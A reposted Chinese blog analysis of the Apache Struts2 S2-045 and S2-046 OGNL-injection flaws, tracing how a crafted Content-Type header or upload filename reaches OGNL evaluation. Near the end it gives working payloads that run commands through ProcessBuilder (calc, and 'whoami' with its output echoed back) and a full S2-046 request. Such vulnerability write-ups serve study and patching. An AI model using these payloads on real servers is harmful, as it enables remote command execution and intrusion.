S2-045、S2-046

最新推荐文章于 2024-07-27 02:10:17 发布
最新推荐文章于 2024-07-27 02:10:17 发布
阅读量442 收藏 1
点赞数
文章标签: java
原文链接:http://www.cnblogs.com/jinqi520/p/10815249.html
版权

前言

    S2-045依然是一个Ognl表达式注入导致的RCE漏洞,且漏洞很严重。另外,还是建议读者阅读本篇文章前先看下系列文章的第一篇。

正文

    依然是第一篇文章中讲过,StrutsPrepareFilter的doFilter方法中,在获取action mapper前会对HttpServletRequest做一次封装。

     跟进该方法内:

    可以看到在wrapRequest方法根据请求中的Content-Type的不同有两种封装方式,当Content-Type头信息中包含有“multipart/form-data”字符串时将使用MultiPartRequestWrapper进行封装,跟进:

这里最好还是debug一下进去,以免分析错了
   curl  http://localhost:8088   -H  "Content-Type: multipart/form-data"      (使用curl构造请求头方便一点)

可以看到此时实际上调用的是JakartaMultiPartRequest,parse() ,跟进:

processUpload()方法故名思意,应该是处理文件上传的(Content-Type: multipart/form-data 本身就意味着请求是个上传请求),如果上传操作中程序报错,会被101行出的Exception 捕获到了

这里有个大坑,大家看到上面图片中的101行中e的值了没?报错信息里压根就没有字符串是我们之前输入的,是一段固定的字符串,无语(为了文章的连续性,我将这个放在最后面讲。)。

关键函数出来了,就是buildErrorMessage,跟进去:

调用了LocalizedTextUtil.findText(),继续跟进:

findText方法很长,关键在于第325行处调用了getDefaultMessage方法

跟进该方法

    第399行处调用了TextParseUtil.translateVariables()对报错信息message进行了ognl表达式解析,这个方法我们之前分析过,就是对${}或%{}中的字符串解析,这次就不跟进了。

    现在再回头看看,怎样让报错信息中带有我们的输入信息呢?之前我们说了是执行processUpload(request, saveDir);时报错了,我们跟进该方法内看看:

执行parseRequest()时报的错。(什么?我是怎么知道是这个方法报的错,debug发现的)跟进这个方法:

看了没,contentType不能以multipart开头才会将它加入到报错信息中,否则将报其他的错误。

最后给出poc吧(windows下弹框poc):

Content-Type: %{#type='multipart/form-data',#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd='calc',#cmds={'cmd.exe','/c',#cmd},#p=new java.lang.ProcessBuilder(#cmds),#process=#p.start()}

 

兼容版有回显poc:
Content-Type:  %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

 

S2-046

S2-046和S2-045的爆发点是一样的,只是输入点有些不同,利用方式上不一样。满足以下条件时:

  1. Content-Type 中包含multipart/form-data

  2. Content-Disposition中filename包含OGNL语句

  3. 文件大小大于2G(默认情况下),通过设置Content-Length就可以了;或者filename中有空字节\x00

 

给出别人的poc

 

POST /doUpload.action HTTP/1.1

Host: localhost:8080

Content-Length: 10000000

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z

Connection: close

 

------WebKitFormBoundaryAnmUgTEhFhOZpr9z

Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"

Content-Type: text/plain

Kaboom

 

------WebKitFormBoundaryAnmUgTEhFhOZpr9z--

 

 

参考文章

https://www.oschina.net/news/83099/struts2--remote-code-execution-vulnerability

https://cwiki.apache.org/confluence/display/WW/S2-045

https://cwiki.apache.org/confluence/display/WW/S2-046

https://www.jianshu.com/p/344f5091499d

转载于:https://www.cnblogs.com/jinqi520/p/10815249.html

weixin_30241919
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
s2-045 java_S2-045S2-046
weixin_42516104的博客
02-22 267
前言S2-045依然是一个Ognl表达式注入导致的RCE漏洞,且漏洞很严重。另外,还是建议读者阅读本篇文章前先看下系列文章的第一篇。正文依然是第一篇文章中讲过,StrutsPrepareFilter的doFilter方法中,在获取action mapper前会对HttpServletRequest做一次封装。跟进该方法内:可以看到在wrapRequest方法根据请求中的Content-Type的不...
修复struts2的安全漏洞(编号S2-045S2-046)
07-18
给还用struts2框架的系统提供一个完美的解决方案,里面的struts2版本jar都统一好,大家在用的时候直接将对应的jar先删除,然后用这里面的jar包。必免jar冲突了
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Struts2 S2-045远程执行代码漏东
最新发布
weixin_42503415的博客
07-27 61
Struts2 S2-045远程执行代码漏懂允许公鸡者通过创建恶意的HTTP请求来远程执行系统命令。具体来说,S2-045漏懂是因为在使用基于Jakarta插件的文件上传功能时,Struts2框架未能正确处理用户输入的错误信息。当进行文件上传时,如果恶意用户修改了HTTP请求头中的Content-Type值,这可能会触发异...
Struts2 s2-045还未走,s2-046 就来了
TUDP
03-21 1553
参考s-045的解决方案 参考s-045的解决方案 增加过滤参数吧 --------------------Header  过滤-------------- Enumeration e= request.getHeaderNames(); while(e.hasMoreElements()){ String key=e.nextElement().toString(); String
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
Struts2 045漏洞S2-045漏洞利用工具python 视图版
03-07
Struts2 045漏洞S2-045漏洞利用工具python 视图版 执行python exp.py后 自动弹出对话框
java Struts 2 远程代码执行漏洞(s2-045\s2-046)修复
u013208054的博客
05-19 733
升级以下相关包到2.3.32版本: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar
Struts的s2-045s2-046漏洞修复及2.3升级2.5
fubin5115的博客
03-10 5468
背景近期在公司老系统中出现服务器中毒情况,原来公司服务运行在Windows系统上,中毒之后切换Linux平台,单纯的认为凭借Linux的安全性可以解决中毒的情况,没想到Linux一样也中毒了,服务器重新安装Linux服务器之后依然中毒,此时考虑到老系统中Struts漏洞的问题,经检测,确实是有这个问题。漏洞介绍 Struts影响版本:Struts2 2.3.5-2.3.31 Struts 2.5-2
struts2S2-045S2-046漏洞解决办法
蓝关故人
03-01 1280
漏洞介绍 Struts影响版本:Struts2 2.3.5-2.3.31 Struts 2.5-2.5.10漏洞原因:基于Jakarta Multipart parser的文件上传模块在处理文件上传(multipart)的请求时候对异常信息做了捕获,并对异常信息做了OGNL表达式处理。但在在判断content-type不正确的时候会抛出异常并且带上Content-Type属性值,可通过精心构造附...
K8_Struts2_EXP S2-045 20170310.rar
03-31
Struct 2 S2-045/046 漏洞检测工具,可以有效检测我们服务是不是存在该漏洞,从而有效的解决漏洞,工具为exe的可执行文件,杀毒软件会自动禁用,只要手动恢复就可以用了。
K8_Struts2_EXP S2-045 & 任意文件上传 20170310
09-15
K8_Struts2_EXP S2-045 & 任意文件上传 20170310,无密码,2017版,最新版
K8_Struts2_EXP+S2-045+&+任意文件上传+20170309
11-23
K8_Struts2_EXP+S2-045+&+任意文件上传+20170309,struts安全漏洞扫描工具。
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 3773
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
S2-046 远程代码执行漏洞(CVE-2017-5638)
玄道的网安博客
06-29 996
前言 使用Jakarta插件处理文件上传操作时可能导致远程代码执行漏洞。 影响版本 Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞环境 执行如下命令启动struts2 2.3.30: docker-compose up -d 访问http://your-ip:8080即可看到上传页面。 漏洞复现 与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用\x00截断。 由于需要发送畸形数据包
S2-045之搬码工复现(含调整后能用的poc代码)
manic_pfy的博客
08-15 1292
S2-045复现(含调整能用的poc代码)概述S2-045官方解释复现过程实验环境Struts项目搭建版本需求漏洞复现脚本代码执行方式代码存在的问题问题解决复现效果漏洞解决方案 概述 写这篇文是因为在系统维护过程,发现安全系统拦截到了这个漏洞。但是网上教程大都简单描述,要不然就是照搬i春秋实验的过程,对于搬码工的我来说,CV操作用不了的,是真的看不懂好吗?i春秋的环境中的文件又不能拷贝出来,你们那...
Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)
Anprou的博客
03-07 1728
上次曝Struts 2的漏洞已经是半年多以前的事情了。这次的漏洞又是个RCE远程代码执行漏洞。 简单来说,基于Jakarta Multipart解析器进行文件上传时,利用漏洞可进行远程代码执行。 该漏洞由安恒信息Nike Zheng上报。 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框
【vulhub】Structs2 S2-045 远程代码执行漏洞(CVE-2017-5638)
weixin_42884199的博客
12-07 548
前言 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload payload1: Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data 在请求头插入上述payload 三、漏洞利用 payload2: Content-Type:
apache struts2框架命令执行漏洞(s2-045s2-046)
01-11
Apache Struts2框架是一种流行的开源Web应用程序开发框架,但曾经发生过多个命令执行漏洞,其中包括s2-045s2-046漏洞。 s2-045漏洞源于在处理远程表达式语言(OGNL)时存在安全漏洞,攻击者可以利用构造特定的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值